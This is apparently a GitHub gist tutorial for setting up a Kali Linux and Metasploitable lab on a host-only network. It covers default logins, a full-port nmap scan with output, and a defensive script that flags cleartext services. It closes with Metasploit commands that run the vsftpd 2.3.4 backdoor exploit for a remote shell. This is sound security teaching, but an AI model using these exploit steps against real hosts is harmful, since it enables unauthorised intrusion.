Kali Linux 2016.2 - Metasploitable Tutorial

Metasploitable Tutorial

https://www.kali.org/downloads/
https://sourceforge.net/projects/metasploitable/
https://community.rapid7.com/docs/DOC-1875

1. create "Host-only Adapter"

# https://www.virtualbox.org/manual/ch06.html
NAT (internet)
NAT Network (VM to VM, internet)
Bridged Adapter (VM uses Host adapter)
Internal Network (VM to VM)
Host-only Adapter (VM to VM, uses software Host adapter)

2. import Metasploitable vmdk, configure Networking

3. import Kali ova, configure Networking

4. login to Kali Linux

username	root
password	toor

5. login to Metasploitable

username	msfadmin
password	msfadmin

6. determine the IP addresses of the machines

ifconfig # run this in both systems
192.168.56.101	Kali
192.168.56.102	Metasploitable

7. verify networking is set up

# Kali Linux
ping -c 4 <metasploitable_ip>
# Metasploitable
ping -c 4 <kali_ip>

8. verify running services in Metasploitable

# Metasploitable
sudo netstat -tunlp | less

9. port scan Metasploitable

# Kali Linux
nmap -p0-65535 <metasploitable_ip>
nmap -sV -p0-65535 <metasploitable_ip>

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  shell       Netkit rshd
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         Unreal ircd
6697/tcp  open  irc         Unreal ircd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34929/tcp open  mountd      1-3 (RPC #100005)
47746/tcp open  unknown
49161/tcp open  status      1 (RPC #100024)
57689/tcp open  nlockmgr    1-4 (RPC #100021)
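
To read a scan table like the one above from the defender's side, the following added example (not part of the original gist) filters `nmap -sV` output down to the open services that carry logins or shells in cleartext, which are the first candidates to disable or replace. The function names and the service list are assumptions of this example.

```shell
#!/bin/sh
# Added example: triage `nmap -sV` table output for cleartext login services.
# Usage: nmap -sV -p0-65535 <metasploitable_ip> | flag_cleartext

# Names from the nmap SERVICE column for protocols that send credentials and
# session data unencrypted. The list is an assumption of this example.
CLEARTEXT_SERVICES="ftp telnet exec login shell"

# Reads nmap table output on stdin and prints "port<TAB>service<TAB>version"
# for every open port whose service name is in CLEARTEXT_SERVICES.
flag_cleartext() {
  awk -v list="$CLEARTEXT_SERVICES" '
    BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) risky[a[i]] = 1 }
    # Data rows look like: 21/tcp  open  ftp  vsftpd 2.3.4
    $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" && ($3 in risky) {
      version = ""
      for (i = 4; i <= NF; i++) version = version (i > 4 ? " " : "") $i
      # Some rows (513/tcp above) have an empty VERSION column.
      if (version == "") version = "(no version reported)"
      printf "%s\t%s\t%s\n", $1, $3, version
    }'
}

# Constructed sample: a few rows copied from the scan output above.
sample_scan() {
  cat <<'EOF'
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
513/tcp   open  login
514/tcp   open  shell       Netkit rshd
1524/tcp  open  shell       Metasploitable root shell
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
EOF
}

# Demonstration on the sample rows; ssh and mysql are filtered out.
sample_scan | flag_cleartext
```

Matching on the service name also reports the 1524/tcp row, because nmap labels it `shell` in the SERVICE column.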

10. configure Metasploit

# start Metasploit within Kali Linux: click the icon in the left-side dock
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
set payload cmd/unix/interact
show options
set RHOST <metasploitable_ip>
set RPORT 21
exploit

dhtzl commented May 17, 2019

nice

@andreslargo

Awesome, thanks!
